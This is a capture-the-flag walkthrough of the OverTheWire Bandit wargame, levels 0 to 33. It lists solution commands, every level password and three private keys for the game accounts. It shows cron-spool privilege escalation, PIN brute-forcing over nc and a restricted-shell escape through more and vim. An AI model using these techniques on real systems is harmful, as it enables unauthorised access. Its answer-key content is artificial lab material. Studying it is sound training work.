overthewire bandit note

overthewire

bandit level 0

bandit0@bandit:~$ cat readme
ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If

bandit level 1

bandit1@bandit:~$ cat ./-
263JGJPfgU6LtdEvgfWU1XP5yac29mFx

bandit level 2

bandit2@bandit:~$ cat ./sp*
MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx

bandit level 3

bandit3@bandit:~$ cat ./inhere/...H*
2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ

bandit level 4

bandit4@bandit:~$ file ./inhere/* | grep ASCII | cut -d ':' -f 1 | xargs cat
4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw

bandit level 5

bandit5@bandit:~$ find ./inhere/ -type f -size 1033c | xargs cat
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

bandit level 6

bandit6@bandit:~$ find / -type f -size 33c -user bandit7 -group bandit6 2> /dev/null | xargs cat
morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj

bandit level 7

bandit7@bandit:~$ cat data.txt | grep millionth | awk '{print $2}'
dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc

bandit level 8

bandit8@bandit:~$ sort data.txt | uniq -u
4CKMh1JI91bUIZZPXDqGanal4xvAg0JM

bandit level 9

From man grep, under "File and Directory Selection": -a, --text — Process a binary file as if it were text; this is equivalent to the --binary-files=text option.

bandit9@bandit:~$ cat data.txt | grep -a === |strings | tail -n 1 |awk '{print $2}'
FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey

bandit level 10

bandit10@bandit:~$ cat data.txt | base64 -d | awk '{print $NF}'
dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr

bandit level 11

Map each character of the first set to the corresponding character of the second set:

tr 'abcd' 'jkmn' < path/to/file

CHAR1-CHAR2 all characters from CHAR1 to CHAR2 in ascending order

tr 'N-ZA-Mn-za-m' 'A-Za-z'

bandit11@bandit:~$ cat data.txt  | tr 'A-Za-z' 'N-ZA-Mn-za-m' | awk '{print $NF}'

or

use Vim's g? operator, which applies ROT13 to the text it is given (for example g?? on the current line)

7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4

bandit level 12

Revert a plaintext hexdump back into binary, and save it as a binary file:

xxd [-r|-revert] [-p|-postscript] input_file output_file
bandit12@bandit:~$ mktemp -d
/tmp/tmp.KykZXHYnaH

bandit12@bandit:~$ cp data.txt /tmp/tmp.KykZXHYnaH

bandit12@bandit:~$ cd /tmp/tmp.KykZXHYnaH

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ xxd -r data.txt > a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a
a: bzip2 compressed data, block size = 900k

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ bzip2 -d a
#bzip2: Can't guess original name for a -- using a.out

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a.out
a.out: gzip compressed data, was "data4.bin", last modified: Thu Apr 10 14:22:57 2025, max compression, from Unix, original size modulo 2^32 20480

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d a.out
gzip: a.out: unknown suffix -- ignored

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ mv a.out a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a
a: POSIX tar archive (GNU)
bandit12@bandit:/tmp/tmp.KykZXHYnaH$ tar xf a

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/tmp.KykZXHYnaH$ tar xf data5.bin

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ bzip2 -d data6.bin
#bzip2: Can't guess original name for data6.bin -- using data6.bin.out

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ mv data6.bin.out a.tar

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ tar xf a.tar

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a
a: POSIX tar archive (GNU)

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data7.bin
#data7.bin: cannot open `data7.bin' (No such file or directory)

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Apr 10 14:22:57 2025, max compression, from Unix, original size modulo 2^32 49

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ mv data8.bin d.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d d.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file d
d: ASCII text

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ cat d
FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn

bandit level 13

bandit13@bandit:~$ cat sshkey.private
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+
gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB
ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb
ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV
ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7
jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA
J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE
pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67
xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS
nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD
o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe
ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf
laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS
M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU
1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH
PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s
8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+
xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1
GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J
3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY
iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby
9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD
qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0
kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN
/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA==
-----END RSA PRIVATE KEY-----

bandit level 14

Connect to a remote server with a specific identity (private key):

ssh -i path/to/key_file username@remote_host
# Create a file named sshkey.private and paste the above private key into it; if ssh rejects the key because its permissions are too open, run chmod 600 sshkey.private
> vim sshkey.private

> ssh bandit14@bandit.labs.overthewire.org -p 2220 -i sshkey.private

As the level 13 description hints, the password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14.

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14

This password is not the password for the next level; it is the password to submit to port 30000.

MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS

Connect to a target listener on the specified port:

nc host port
bandit14@bandit:~$ nc localhost 30000
#copy the password from above and paste it here
Correct!
#password to next level

or

cat /etc/bandit_pass/bandit14 | nc localhost 30000
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo

bandit level 15

bandit15@bandit:~$ openssl s_client localhost:30001
# some info ... or use -quiet to suppress the output
# openssl s_client -connect localhost:30001 -quiet
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo
Correct!
#password to next level
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx

Another way to get the password is to use either of the commands below:

ncat --ssl localhost 30001
socat - OPENSSL:localhost:30001,verify=0
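# verify=0 disables certificate verification, so the server is not authenticated; that is tolerable only because this is a lab service reached over localhost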

bandit level 16

Show all TCP sockets listening on the local 8080 port:

ss [-lt|--listening --tcp] src :8080
bandit16@bandit:~$ ss -lt | grep 31
LISTEN 0 4096 0.0.0.0:31518 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:31790 0.0.0.0:*
LISTEN 0 64 *:31691 *:*
LISTEN 0 64 *:31046 *:*
LISTEN 0 4096 *:2231 *:*
LISTEN 0 64 *:31960 *:*

bandit16@bandit:~$ ncat --ssl localhost 31790
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----

bandit level 17

ssh bandit17@bandit.labs.overthewire.org -p 2220 -i sshkey.private
bandit17@bandit:~$ diff passwords.new passwords.old
x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO

bandit level 18

ssh bandit18@bandit.labs.overthewire.org -p 2220 -t cat ./readme

or

ssh bandit18@bandit.labs.overthewire.org -p 2220 /bin/bash

cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

bandit level 19

bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

bandit level 20

bandit20@bandit:~$ echo flaglevel20 | nc -l -p 7890 &
[1] 2043

bandit20@bandit:~$ ./suconnect 7890
Read: flaglevel20
Password matches, sending next password
flagtonextlevel
[1]+ Done echo flaglevel20 | nc -l -p 7890
EeoULMCra2q0dSkYj561DX7s1CpBuOBt

bandit level 21

bandit21@bandit:~$ ls /etc/cron.d/
clean_tmp cronjob_bandit23 e2scrub_all sysstat
cronjob_bandit22 cronjob_bandit24 otw-tmp-dir

bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
# NOTE(review): the comments in this listing are reviewer annotations, not part
# of the file on the server.
# The cron entry shown before this listing runs the script every minute (and at
# reboot) as bandit22.
# Mode 644 makes the /tmp file readable by every local user ...
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
# ... and this copies bandit22's password into it. The random-looking file name
# is no protection, because the script that contains it can be read with cat.
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

bandit level 22

bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null

bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
# NOTE(review): the comments in this listing are reviewer annotations, not part
# of the file on the server.
# Copies the invoking user's password file to a file in /tmp whose name is
# derived from the user name. The cron entry shown before this listing runs it
# as bandit23.

# Account the script is running as.
myname=$(whoami)
# File name = MD5 of the fixed sentence "I am user <name>" (echo appends a
# newline). The value is deterministic, so anyone who can read this script can
# recompute it for any user name; it hides nothing.
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

# The password ends up in /tmp under that predictable name.
cat /etc/bandit_pass/$myname > /tmp/$mytarget

echo I am user bandit23 | md5sum |cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

bandit level 23

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
# NOTE(review): the comments in this listing are reviewer annotations, not part
# of the file on the server.
# Runs, then deletes, every file found in /var/spool/<invoking user>/foo.
# Security-relevant point: files owned by bandit23 are executed with the
# privileges of the account running this script, so write access to that
# directory amounts to code execution as that account. The owner test limits
# who may supply a script, not what the script may do.
# NOTE(review): the cron entry that runs this script is not shown on the page;
# presumably it runs as bandit24, matching the /var/spool/bandit24/foo path
# used in the session that follows this listing.

myname=$(whoami)

# The result of cd is not checked; if it fails, the loop below executes and
# deletes files in whatever the current directory happens to be.
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
# "* .*" covers regular names and dot-files; "." and ".." are filtered out below.
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
# $i is unquoted here and below, so names containing whitespace or glob
# characters are split or expanded before stat/timeout/rm see them.
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
# Run the file; timeout sends signal 9 if it is still running after 60 seconds.
timeout -s 9 60 ./$i
fi
# Every entry is removed, whether or not it was executed.
rm -f ./$i
fi
done

bandit23@bandit:~$ vim /var/spool/bandit24/foo/tmp.sh
#!/bin/bash
# Copies /etc/bandit_pass/bandit24 to /tmp/bandit24.pass. It only succeeds when
# executed by an account that can read that password file; here that is the
# cron job shown before this listing, which runs files placed in its spool
# directory.

myname=bandit24
# NOTE(review): the destination is a fixed, guessable name in /tmp on a shared
# host; with a typical umask the copy is presumably readable by other local
# users as well. A directory from mktemp -d would keep it private.
cat /etc/bandit_pass/$myname > /tmp/$myname.pass

bandit23@bandit:~$ chmod 777 /var/spool/bandit24/foo/tmp.sh

bandit23@bandit:~$ cat /tmp/bandit24.pass
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

bandit level 24

bandit24@bandit:/tmp/tmp.YfKCvV5CzF$ vim tmp.sh
#!/bin/bash
# Writes one "<password> <pincode>" line for each value from 1000 to 9999 and
# sends the whole stream over a single nc connection to localhost:30002.
# NOTE(review): the output that follows this listing shows the service
# answering guess after guess on the same connection. This enumeration works
# only because the service applies no attempt limit, delay or lockout; any of
# those would stop it.
password="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"

for i in {1000..9999}; do
echo "$password $i"
done | nc localhost 30002

bandit24@bandit:/tmp/tmp.YfKCvV5CzF$ ./tmp.sh
...
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Correct!
The password of user bandit25 is
iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

bandit level 25

bandit25@bandit:~$ cat bandit26.sshkey
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW
pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9
/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG
xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi
1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix
3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW
qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi
il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w
e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh
Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME
zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX
c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le
wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV
tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI
2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU
i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj
6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm
pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz
JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3
JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd
1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh
ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe
euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5
/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t
IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY=
-----END RSA PRIVATE KEY-----

bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
# NOTE(review): the comments in this listing are reviewer annotations, not part
# of the file on the server.
# Login shell of bandit26 according to the /etc/passwd entry shown before this
# listing: instead of an interactive shell the user gets a pager on text.txt.

export TERM=linux

# exec replaces this process with more, so the "exit 0" below is reached only
# if exec itself fails.
# Security-relevant point: a pager is not a restricted environment. When more
# has to paginate it waits for input, and the steps after this listing use its
# "v" command to start an editor.
exec more ~/text.txt
exit 0

taken from https://medium.com/@coturnix97/overthewires-bandit-25-26-shell-355d78fd2f4d

# use a small terminal window, so that more has to paginate text.txt and waits for a keypress instead of exiting
➤ ssh bandit26@bandit.labs.overthewire.org -p 2220 -i bandit26.sshkey

# in more, press v to open the editor, then run :e /etc/bandit_pass/bandit26 to read the password
# :set shell=/bin/bash
# :shell

s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

bandit level 26

bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB

bandit level 27

Don't forget to create a directory with mktemp -d and clone the git repository into it; otherwise you will get: fatal: could not create work tree dir 'repo': Permission denied

bandit27@bandit:~$ mktemp -d
/tmp/tmp.W54bwIQdTm

bandit27@bandit:~$ cd /tmp/tmp.W54bwIQdTm

bandit27@bandit:/tmp/tmp.W54bwIQdTm$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
...
bandit27-git@localhost's password:
...

bandit27@bandit:/tmp/tmp.W54bwIQdTm/repo$ cat README
The password to the next level is:

Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

bandit level 28

bandit28@bandit:~$ mktemp -d
/tmp/tmp.Dnue3slg2g
bandit28@bandit:~$ cd /tmp/tmp.Dnue3slg2g
bandit28@bandit:/tmp/tmp.Dnue3slg2g$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|


This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames

bandit28-git@localhost's password:
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.

bandit28@bandit:/tmp/tmp.Dnue3slg2g/repo$ git log -p
commit 674690a00a0056ab96048f7317b9ec20c057c06b (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Apr 10 14:23:19 2025 +0000

fix info leak

diff --git a/README.md b/README.md
index d4e3b74..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials

- username: bandit29
-- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
+- password: xxxxxxxxxx
...
4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7

bandit level 29

bandit29@bandit:/tmp/tmp.uymj8B2LpI$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit29/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|


This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames

bandit29-git@localhost's password:
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.

bandit29@bandit:/tmp/tmp.uymj8B2LpI/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev

bandit29@bandit:/tmp/tmp.uymj8B2LpI/repo$ git log -p origin/dev
commit a97d0dbf8fd910ead6fcf648829ff55c1a629c8e (origin/dev)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Apr 10 14:23:21 2025 +0000

add data needed for development

diff --git a/README.md b/README.md
index 1af21d3..bc6ad3d 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for bandit30 of bandit.
## credentials

- username: bandit30
-- password: <no passwords in production!>
+- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
...
qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

bandit level 30

# same as above, but with bandit30-git
bandit30@bandit:/tmp/tmp.G0HYcVr8Od/repo$ git tag
secret
bandit30@bandit:/tmp/tmp.G0HYcVr8Od/repo$ git show secret
fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy

bandit level 31

# same login and clone as above

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
File name: key.txt
Content: 'May I come in?'
Branch: master

# remove the rules from the .gitignore file so that they cannot exclude key.txt
bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ vim .gitignore

# create the key.txt file and add the content
bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ vim key.txt

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ git add .

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ git commit

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ git push
...
Writing objects: 100% (4/4), 326 bytes | 326.00 KiB/s, done.
Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo'

3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K

bandit level 32

taken from https://mayadevbe.me/posts/overthewire/bandit/level33/

>> $0
$ /bin/bash

bandit33@bandit:~$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0

bandit level 33

1
2
3
4
5
6
7
8
9
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!

